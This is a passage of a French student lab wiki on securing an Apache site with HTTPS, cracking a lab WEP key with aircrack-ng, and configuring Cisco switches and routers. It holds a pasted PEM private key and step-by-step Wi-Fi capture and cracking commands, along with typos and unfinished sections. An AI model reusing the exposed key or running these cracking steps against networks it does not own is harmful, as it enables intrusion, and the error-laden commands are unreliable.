      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----BEGIN PRIVATE KEY-----&lt;br /&gt;
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDBKS9p8572UiXo&lt;br /&gt;
2W1dAiKEKLq+B6ge/si0AhMHfLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzk&lt;br /&gt;
G9IEhnEpWSTNvspTO60PgNPoEUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP8&lt;br /&gt;
0s+9Wjo2vf2PkESPTjfM0zKP2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i9&lt;br /&gt;
5+/ST3r2T0D8xP/ltEBC0Q7iU/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnH&lt;br /&gt;
KS4f+erNFYpx5iNiHhv6larVG0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3&lt;br /&gt;
fS4t1K83AgMBAAECggEAZa2KWdl1+e+wKOwbF3SCOtM9yb46D2bKu4bEAZL1C+Mm&lt;br /&gt;
e8O6hEn9suwYvNGPzebavRCmqx29KBJ2c3T5jow+kSdtqigeVMX7CUglQ+mj4GkM&lt;br /&gt;
4AfOVI6zL5XGqp7c/fbF7nEDp7zdVFFqwdEurVwLfLlx+dpVXKIt2VHrMbEtarlu&lt;br /&gt;
nngBsyCGi1lqJJS5uLjEQrSkdnR/j0eNrTl7FTlIfrurc2Oaau2j/B/Q835ESnGw&lt;br /&gt;
u2PUP7LvjH1wX4cRPB3sJAUSqfIDfe1sFQ800Z29SW8491buscTRAYfuuoTa1L2e&lt;br /&gt;
3Tglo2SWlZwpC10PNxBlSyFR+5zhuAQgHckxZ9+RMQKBgQDk+lLsreXhhVdD5+S9&lt;br /&gt;
TG6YLvMtToPc4G9U4RYUNafa9AOUL9HZ/sftkO9/rXNj6HMtnJziFfH6rEdn/M4m&lt;br /&gt;
x8xgl6pd3aPAPPQRWGG/6grXhLd5fexIG1WxIGo4uzLJBqwbtV2dEo1C9T21gisZ&lt;br /&gt;
Om69tuAb+sKBS6ktV+A1Uql3cwKBgQDX9MqPzEp1VcGZ0D3Mo9qS/WTQf14U9Tma&lt;br /&gt;
A2JSeMfCQ0zFm4y2wCRbhvnYy6g9VKSXzOGtZV6SNadXMH1x9jfZ3Tq5i+vk7Dml&lt;br /&gt;
X6kvP0ekcCdQLGOZ/6bH65n3zexSuhsoKekGPTOBGR/vBsoby7jUXxv9c6xnanb6&lt;br /&gt;
M7tuxz6QLQKBgQCwm7KiAm6wRxxLr+xpZS5YCr5dT5W9Iw47tXBGHixdYJ/yCAAf&lt;br /&gt;
17d0sLlJDQtXH87We1k1uB9vbLmWpxKKLsigJ9qrk2vdtiW5yyV51JaQLDknZ8x6&lt;br /&gt;
wTqS56GGKDy/eHn+1SBjKg/yeR0jhkafqsYHZantarfi6eyOoJy6BAvZqQKBgErB&lt;br /&gt;
I/VPBF9FhjTWTu4tshW7vVAnJswebwgPL9PYl115qnOk+rqwHGXKfWY8aUqBqFAb&lt;br /&gt;
zesV8fyusfSOhn4Sexbha9iaxNeDphjG2mvOfeBAKnuoQfom8va1aaDMGYgxgAER&lt;br /&gt;
MObF/LQtnE5DjWa9yIdLPQcpKX7K7dCCY9lfAxspAoGBAORIw1fuEXjYOodPLvnf&lt;br /&gt;
y9iTtj/cs4nfUYknrHTyb+R4a1t/DopnJZCm8OI4TtIvQNCiPKq2PsN9PqdQWcbq&lt;br /&gt;
UkjEJVtEWjD1K7/6ValuRbp0mF8AyzBiNSCXWY3e38p0hf4LJuUZrz+LNGGIt5Fk&lt;br /&gt;
0jePVCaYcUh3i1B1Lx43TDBg&lt;br /&gt;
-----END PRIVATE KEY-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
